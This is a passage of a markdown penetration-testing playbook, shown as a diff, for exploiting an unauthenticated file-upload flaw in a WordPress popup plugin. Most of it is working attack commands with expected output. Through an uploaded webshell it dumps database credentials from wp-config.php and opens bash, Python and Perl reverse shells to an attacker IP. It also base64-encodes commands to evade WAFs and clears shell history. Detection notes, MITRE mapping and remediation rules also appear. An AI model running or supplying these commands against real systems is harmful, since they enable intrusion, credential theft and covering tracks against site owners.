|
+
|
|
294
|
+
# Read WordPress database credentials
|
|
295
|
+
curl -s "${TARGET}${SHELL_PATH}" --data-urlencode "cmd=cat /var/www/html/wp-config.php" \
|
|
296
|
+
| grep -E "DB_NAME|DB_USER|DB_PASSWORD|DB_HOST"
|
|
297
|
+
```
|
|
298
|
+
|
|
299
|
+
**Expected Output (wp-config.php dump):**
|
|
300
|
+
```
|
|
301
|
+
define( 'DB_NAME', 'wordpress_db' );
|
|
302
|
+
define( 'DB_USER', 'wp_user' );
|
|
303
|
+
define( 'DB_PASSWORD', 's3cr3tpassword' );
|
|
304
|
+
define( 'DB_HOST', 'localhost' );
|
|
305
|
+
```
|
|
306
|
+
|
|
307
|
+
---
|
|
308
|
+
|
|
309
|
+
### Step 6 — Escalate to Interactive Reverse Shell (Optional)
|
|
310
|
+
|
|
311
|
+
**Objective:** Upgrade from a webshell to an interactive reverse shell for easier post-exploitation.
|
|
312
|
+
|
|
313
|
+
```bash
|
|
314
|
+
# On attacker machine — start netcat listener
|
|
315
|
+
nc -lvnp 4444
|
|
316
|
+
|
|
317
|
+
# On target — trigger reverse shell via webshell
|
|
318
|
+
# URL-encode the bash reverse shell command
|
|
319
|
+
ATTACKER_IP="10.10.10.10"
|
|
320
|
+
ATTACKER_PORT="4444"
|
|
321
|
+
|
|
322
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
323
|
+
--data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1'"
|
|
324
|
+
```
|
|
325
|
+
|
|
326
|
+
**Expected Output (on netcat listener):**
|
|
327
|
+
```
|
|
328
|
+
Listening on 0.0.0.0 4444
|
|
329
|
+
Connection received on TARGET-IP 54321
|
|
330
|
+
bash: no job control in this shell
|
|
331
|
+
www-data@TARGET-HOSTNAME:/var/www/html$
|
|
332
|
+
```
|
|
333
|
+
|
|
334
|
+
**Fallback reverse shells if bash is unavailable:**
|
|
335
|
+
```bash
|
|
336
|
+
# Python reverse shell
|
|
337
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
338
|
+
--data-urlencode "cmd=python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.10.10.10\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
|
|
339
|
+
|
|
340
|
+
# Perl reverse shell
|
|
341
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
342
|
+
--data-urlencode "cmd=perl -e 'use Socket;\$i=\"10.10.10.10\";\$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'"
|
|
343
|
+
```
|
|
344
|
+
|
|
345
|
+
---
|
|
346
|
+
|
|
347
|
+
## Real-World Reference
|
|
348
|
+
|
|
349
|
+
**CVE-2024-3673 — Popup Builder by Sygnoos**
|
|
350
|
+
|
|
351
|
+
| Field | Detail |
|
|
352
|
+
|---|---|
|
|
353
|
+
| Plugin Name | Popup Builder – Create highly converting, mobile friendly marketing popups |
|
|
354
|
+
| Affected Versions | <= 4.1.14 |
|
|
355
|
+
| Fixed Version | 4.2.3 |
|
|
356
|
+
| Vulnerability Type | Unauthenticated Arbitrary File Upload |
|
|
357
|
+
| CVSS v3.1 Score | 9.8 Critical |
|
|
358
|
+
| Published | April 2024 |
|
|
359
|
+
| Active Installs (at time of disclosure) | 200,000+ |
|
|
360
|
+
|
|
361
|
+
**Exploitation Flow (confirmed):**
|
|
362
|
+
1. No WordPress account or session required
|
|
363
|
+
2. POST to `/wp-admin/admin-ajax.php` with `action=sgpb-subscription-import`
|
|
364
|
+
3. Upload a `.php` file — no file type or extension validation performed
|
|
365
|
+
4. File lands in `/wp-content/uploads/` with attacker-controlled filename
|
|
366
|
+
5. Direct HTTP request to uploaded file triggers PHP execution
|
|
367
|
+
6. Full OS command execution as the web server user (`www-data` on Ubuntu/Debian)
|
|
368
|
+
|
|
369
|
+
**Public References:**
|
|
370
|
+
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3673
|
|
371
|
+
- WPScan Vulnerability DB: https://wpscan.com/vulnerability/CVE-2024-3673
|
|
372
|
+
- Wordfence Advisory: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-builder/
|
|
373
|
+
|
|
374
|
+
---
|
|
375
|
+
|
|
376
|
+
## MITRE ATT&CK Mapping
|
|
377
|
+
|
|
378
|
+
| Step | Phase | Tactic | Technique | Sub-technique | Description |
|
|
379
|
+
|---|---|---|---|---|---|
|
|
380
|
+
| 1 | Reconnaissance | Reconnaissance | T1595 — Active Scanning | T1595.003 — Wordlist Scanning | WPScan enumerates plugins and versions |
|
|
381
|
+
| 2 | Reconnaissance | Reconnaissance | T1596 — Search Open Technical Databases | T1596.002 — WHOIS | CVE database lookup for plugin version |
|
|
382
|
+
| 3 | Initial Access | Initial Access | T1190 — Exploit Public-Facing Application | — | Exploit unauthenticated upload endpoint |
|
|
383
|
+
| 4 | Execution | Execution | T1203 — Exploitation for Client Execution | — | PHP file upload to web-accessible path |
|
|
384
|
+
| 5 | Execution | Execution | T1059 — Command and Scripting Interpreter | T1059.004 — Unix Shell | OS command execution via webshell |
|
|
385
|
+
| 6 | Execution | Execution | T1059 — Command and Scripting Interpreter | T1059.004 — Unix Shell | Interactive reverse shell via bash |
|
|
386
|
+
| 7 | Persistence | Persistence | T1505 — Server Software Component | T1505.003 — Web Shell | Webshell left as persistent backdoor |
|
|
387
|
+
| 8 | Credential Access | Credential Access | T1552 — Unsecured Credentials | T1552.001 — Credentials in Files | Dump wp-config.php for DB credentials |
|
|
388
|
+
|
|
389
|
+
---
|
|
390
|
+
|
|
391
|
+
## Detection & OPSEC
|
|
392
|
+
|
|
393
|
+
### How This Attack Is Detected
|
|
394
|
+
|
|
395
|
+
**Web Application Firewall (WAF):**
|
|
396
|
+
- Rules triggering on `admin-ajax.php` multipart/form-data POST with `.php` extension in filename
|
|
397
|
+
- Signature matching on PHP webshell content patterns (`system(`, `passthru(`, `shell_exec(`)
|
|
398
|
+
|
|
399
|
+
**Web Server Access Logs:**
|
|
400
|
+
- POST requests to `/wp-admin/admin-ajax.php` with large content-type `multipart/form-data`
|
|
401
|
+
- GET/POST requests to files in `/wp-content/uploads/` with `.php` extension
|
|
402
|
+
- Unusual parameters like `cmd=`, `exec=`, `shell=` in query strings
|
|
403
|
+
|
|
404
|
+
**File Integrity Monitoring (FIM):**
|
|
405
|
+
- New `.php` files created in `/wp-content/uploads/` — this path should never contain PHP files
|
|
406
|
+
- Tools: Wordfence, OSSEC, Tripwire, auditd
|
|
407
|
+
|
|
408
|
+
**SIEM / IDS Rules:**
|
|
409
|
+
- Suricata/Snort rules matching PHP shell upload signatures
|
|
410
|
+
- Anomaly detection on outbound connections from web server process (reverse shell)
|
|
411
|
+
- Netflow anomalies: web server process initiating outbound TCP connections
|
|
412
|
+
|
|
413
|
+
**WordPress Security Plugins:**
|
|
414
|
+
- Wordfence, iThemes Security, Sucuri — all flag modified or new PHP files in uploads directory
|
|
415
|
+
|
|
416
|
+
---
|
|
417
|
+
|
|
418
|
+
### Reducing Detection Risk During Authorized Engagement
|
|
419
|
+
|
|
420
|
+
```bash
|
|
421
|
+
# 1. Use a unique, non-generic webshell name
|
|
422
|
+
cp shell.php "wp-backup-$(date +%s).php"
|
|
423
|
+
|
|
424
|
+
# 2. Encode commands to avoid WAF keyword matching
|
|
425
|
+
# Base64-encode the command
|
|
426
|
+
echo -n "id" | base64
|
|
427
|
+
# aWQ=
|
|
428
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
429
|
+
--data-urlencode "cmd=echo aWQ= | base64 -d | bash"
|
|
430
|
+
|
|
431
|
+
# 3. Route traffic through authorized proxy or VPN to match engagement IP range
|
|
432
|
+
|
|
433
|
+
# 4. Throttle requests to avoid rate-limit detection
|
|
434
|
+
sleep 2 && curl ...
|
|
435
|
+
|
|
436
|
+
# 5. Prefer HTTPS to prevent content inspection by network IDS
|
|
437
|
+
|
|
438
|
+
# 6. Minimize command execution — gather needed data in fewest requests
|
|
439
|
+
|
|
440
|
+
# 7. Avoid spawning reverse shells unless explicitly in scope
|
|
441
|
+
# (reverse shells create noisy outbound connections)
|
|
442
|
+
```
|
|
443
|
+
|
|
444
|
+
---
|
|
445
|
+
|
|
446
|
+
### Artifacts Left Behind
|
|
447
|
+
|
|
448
|
+
| Artifact | Location | Type |
|
|
449
|
+
|---|---|---|
|
|
450
|
+
| Uploaded webshell | `/wp-content/uploads/YYYY/MM/shell.php` | File |
|
|
451
|
+
| Apache/Nginx access logs | `/var/log/apache2/access.log` or `/var/log/nginx/access.log` | Log entry |
|
|
452
|
+
| WordPress debug log | `/wp-content/debug.log` | Log entry |
|
|
453
|
+
| PHP error log | `/var/log/php_errors.log` | Log entry |
|
|
454
|
+
| Bash history (if interactive shell obtained) | `/var/www/.bash_history` or `~/.bash_history` | Shell history |
|
|
455
|
+
| Auth log (if SSH attempted post-RCE) | `/var/log/auth.log` | Log entry |
|
|
456
|
+
|
|
457
|
+
---
|
|
458
|
+
|
|
459
|
+
## Cleanup
|
|
460
|
+
|
|
461
|
+
Perform cleanup only after written confirmation from engagement owner that the test phase is complete.
|
|
462
|
+
|
|
463
|
+
### Step 1 — Remove the Webshell
|
|
464
|
+
|
|
465
|
+
```bash
|
|
466
|
+
# Via the webshell itself
|
|
467
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
468
|
+
--data-urlencode "cmd=rm -f /var/www/html/wp-content/uploads/2024/shell.php"
|
|
469
|
+
|
|
470
|
+
# Verify removal
|
|
471
|
+
curl -s "${TARGET}${SHELL_PATH}" -o /dev/null -w "%{http_code}"
|
|
472
|
+
# Expected: 404
|
|
473
|
+
```
|
|
474
|
+
|
|
475
|
+
### Step 2 — Remove Any Additional Files Dropped During Engagement
|
|
476
|
+
|
|
477
|
+
```bash
|
|
478
|
+
# List files created during the engagement window
|
|
479
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
480
|
+
--data-urlencode "cmd=find /var/www/html/wp-content/uploads/ -name '*.php' -newer /var/www/html/wp-config.php"
|
|
481
|
+
|
|
482
|
+
# Remove each identified file
|
|
483
|
+
curl -s "${TARGET}${SHELL_PATH}" \
|
|
484
|
+
--data-urlencode "cmd=rm -f /var/www/html/wp-content/uploads/2024/wp-backup-XXXXX.php"
|
|
485
|
+
```
|
|
486
|
+
|
|
487
|
+
### Step 3 — Clear Bash History (if interactive shell was used)
|
|
488
|
+
|
|
489
|
+
```bash
|
|
490
|
+
# Within the reverse shell session
|
|
491
|
+
history -c
|
|
492
|
+
cat /dev/null > ~/.bash_history
|
|
493
|
+
unset HISTFILE
|
|
494
|
+
```
|
|
495
|
+
|
|
496
|
+
### Step 4 — Document Artifacts for Client Report
|
|
497
|
+
|
|
498
|
+
After cleanup, provide the client with:
|
|
499
|
+
- List of all files uploaded (with full paths and timestamps)
|
|
500
|
+
- List of all commands executed (from engagement notes, not from target logs)
|
|
501
|
+
- Recommendation to rotate WordPress database credentials found in wp-config.php
|
|
502
|
+
- Recommendation to rotate any other credentials found during post-exploitation
|
|
503
|
+
|
|
504
|
+
### Step 5 — Verify Clean State
|
|
505
|
+
|
|
506
|
+
```bash
|
|
507
|
+
# Confirm no webshells remain
|
|
508
|
+
wpscan --url https://TARGET-DOMAIN.com \
|
|
509
|
+
--enumerate m \
|
|
510
|
+
--plugins-detection aggressive
|
|
511
|
+
|
|
512
|
+
# Ask client to run a file integrity scan
|
|
513
|
+
# (Wordfence Scan, Sucuri SiteCheck, or manual find command)
|
|
514
|
+
```
|
|
515
|
+
|
|
516
|
+
---
|
|
517
|
+
|
|
518
|
+
## References
|
|
519
|
+
|
|
520
|
+
### Tools
|
|
521
|
+
|
|
522
|
+
| Tool | Purpose | URL |
|
|
523
|
+
|---|---|---|
|
|
524
|
+
| WPScan | WordPress fingerprinting and plugin enumeration | https://wpscan.com |
|
|
525
|
+
| Nuclei | Template-based CVE scanning | https://github.com/projectdiscovery/nuclei |
|
|
526
|
+
| SearchSploit / Exploit-DB | Local CVE and PoC lookup | https://www.exploit-db.com |
|
|
527
|
+
| Burp Suite Community | HTTP request interception and manipulation | https://portswigger.net/burp |
|
|
528
|
+
| curl | Command-line HTTP request crafting | https://curl.se |
|
|
529
|
+
| netcat | Reverse shell listener | https://nmap.org/ncat/ |
|
|
530
|
+
| python3-requests | HTTP request scripting | https://requests.readthedocs.io |
|
|
531
|
+
|
|
532
|
+
### CVE and Vulnerability Resources
|
|
533
|
+
|
|
534
|
+
| Resource | URL |
|
|
535
|
+
|---|---|
|
|
536
|
+
| NVD — CVE-2024-3673 | https://nvd.nist.gov/vuln/detail/CVE-2024-3673 |
|
|
537
|
+
| WPScan Vulnerability Database | https://wpscan.com/vulnerabilities |
|
|
538
|
+
| Wordfence Intelligence | https://www.wordfence.com/threat-intel/vulnerabilities |
|
|
539
|
+
| Exploit-DB | https://www.exploit-db.com |
|
|
540
|
+
| Packet Storm Security | https://packetstormsecurity.com |
|
|
541
|
+
|
|
542
|
+
### MITRE ATT&CK References
|
|
543
|
+
|
|
544
|
+
| Technique | URL |
|
|
545
|
+
|---|---|
|
|
546
|
+
| T1190 — Exploit Public-Facing Application | https://attack.mitre.org/techniques/T1190 |
|
|
547
|
+
| T1203 — Exploitation for Client Execution | https://attack.mitre.org/techniques/T1203 |
|
|
548
|
+
| T1059 — Command and Scripting Interpreter | https://attack.mitre.org/techniques/T1059 |
|
|
549
|
+
| T1505.003 — Web Shell | https://attack.mitre.org/techniques/T1505/003 |
|
|
550
|
+
| T1552.001 — Credentials in Files | https://attack.mitre.org/techniques/T1552/001 |
|
|
551
|
+
|
|
552
|
+
### Remediation Guidance for Client Reports
|
|
553
|
+
|
|
554
|
+
- Update popup-builder plugin to version 4.2.3 or later immediately
|
|
555
|
+
- Audit `/wp-content/uploads/` for existing PHP files — none should be present
|
|
556
|
+
- Configure web server to deny PHP execution in the uploads directory:
|
|
557
|
+
|
|
558
|
+
```nginx
|
|
559
|
+
# Nginx — deny PHP execution in uploads
|
|
560
|
+
location ~* /wp-content/uploads/.*\.php$ {
|
|
561
|
+
deny all;
|
|
562
|
+
return 403;
|
|
563
|
+
}
|
|
564
|
+
```
|
|
565
|
+
|
|
566
|
+
```apache
|
|
567
|
+
# Apache — deny PHP execution in uploads
|
|
568
|
+
<Directory "/var/www/html/wp-content/uploads">
|
|
569
|
+
php_flag engine off
|
|
570
|
+
</Directory>
|
|
571
|
+
```
|
|
572
|
+
|
|
573
|
+
- Enable a WAF (Cloudflare, ModSecurity, Wordfence) with WordPress rulesets
|
|
574
|
+
- Keep all plugins, themes, and WordPress core updated
|
|
575
|
+
- Implement file integrity monitoring (Wordfence, OSSEC, or Tripwire)
|
|
576
|
+
- Rotate database credentials if exposure is confirmed
|